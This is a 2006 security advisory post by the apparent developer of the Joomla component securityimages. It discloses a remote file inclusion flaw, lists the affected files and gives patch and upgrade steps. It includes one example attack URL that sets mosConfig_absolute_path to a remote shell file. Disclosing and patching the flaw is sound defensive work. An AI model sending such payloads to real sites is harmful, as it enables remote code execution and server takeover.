|
Tuesday, 01 August 2006 19:58 |
|
The webmaster of janwiersma.com sent me an email today
at 6:12AM , his
server was hacked because of a bug in
securityimages. This bug allows a
remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5
Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php
Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/
| In fact I forget to use that line in these files:
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
This avoid any requests to access directly this file.
- upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
Please also contact all Your friends which are using securityimages!
And for my other components?
Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is avalaible!
- upgrade to 1.2.2 (download at Joomla Forge or in my download sections) OR
- patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)
JoomlaCloud is NOT affected
|
YOU ARE ALL URGE TO UPGRADE ASAP!
|
|
Last Updated on Thursday, 17 August 2006 21:54 |
Tags
